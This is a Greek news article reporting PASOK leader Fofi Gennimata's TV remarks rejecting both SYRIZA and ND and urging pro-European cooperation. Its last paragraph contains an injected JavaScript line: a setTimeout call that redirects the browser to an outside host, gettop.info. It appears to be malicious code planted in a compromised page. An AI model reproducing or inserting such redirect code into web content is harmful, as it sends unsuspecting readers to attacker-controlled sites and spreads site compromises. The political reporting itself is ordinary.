Γεννηματά: Ούτε με ΣΥΡΙΖΑ, ούτε με ΝΔ

0
7

 

Tεχνητό το δίπολο ΣΥΡΙΖΑ-ΝΔ υπογράμμισε μιλώντας στην πρωινή εκπομπή του ΣΚΑΪ η Φώφη Γεννηματά που επανέλαβε ότι η Δημοκρατική Συμπαράταξη είναι αυτόνομος πόλος, σαφώς οριοθετημένος από τον ΣΥΡΙΖΑ και τη ΝΔ. Επιπλέον, επέμεινε στην πρότασή της για την ανάγκη συνεργασίας όλων των φιλοευρωπαϊκών δυνάμεων.

«Δεν είναι λύση η διακυβέρνηση από ένα κόμμα με ένα άλλο συμπλήρωμα, η χώρα έχει ανάγκη από τη συνεργασία όλων των φιλοευρωπαϊκών δυνάμεων» υποστήριξε η πρόεδρος του ΠΑΣΟΚ.

«Πιστεύει ο κ. Μητσοτάκης ότι μπορεί μόνος του; Αναλογίζεται την ευθύνη που αναλαμβάνει;» διερωτήθηκε και κάλεσε τους πολίτες να αλλάξουν τους πολιτικούς συσχετισμούς στις επόμενες εκλογές.

Επίης, χαρακτήρισε αστειότητες την κριτική που ασκήθηκε σχετικά με το ότι η Δημοκρατική Συμπαράταξη στήριξε τις θέσεις της κυβέρνησης στο θέμα του ΕΣΡ. Ανέφερε ότι η θεωρία περί πολιτικής συναλλαγής είναι χυδαία επίθεση κατά της Δημοκρατικής Συμπαράταξης. «Με τη στάση μας υποχρεώσαμε και τον ΣΥΡΙΖΑ και τη ΝΔ να υποχωρήσουν και να συμβιβαστούν» υποστήριξε η κ. Γεννηματά.

Παράλληλα, προσπάθησε να υποβαθμίσει τη διαφοροποίηση Βενιζέλου κάνοντας λόγο για παρεξήγηση που δεν αφορά κανέναν.

Όσον αφορά στην επίσκεψη Ομπάμα τη χαρακτήρισε σημαντική, αλλά πρόσθεσε «θα πρέπει κάποτε να σταματήσουμε να περιμένουμε τον μάγο με τα δώρα και ο πολιτικός κόσμος να συνεννοηθεί και να ζητήσει την κοινωνική συναίνεση πάνω σε ένα σχέδιο για την παραγωγική ανασυγκρότηση της χώρας».

Επιπλέον επανέλαβε ότι το όχημα της συνεργασίας για την Κεντροαριστερά είναι η Δημοκρατική Συμπαράταξη και κατέστησε σαφές ότι οι πόρτες είναι ανοιχτές για όποιους αποδέχονται αυτήν την προοπτική. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here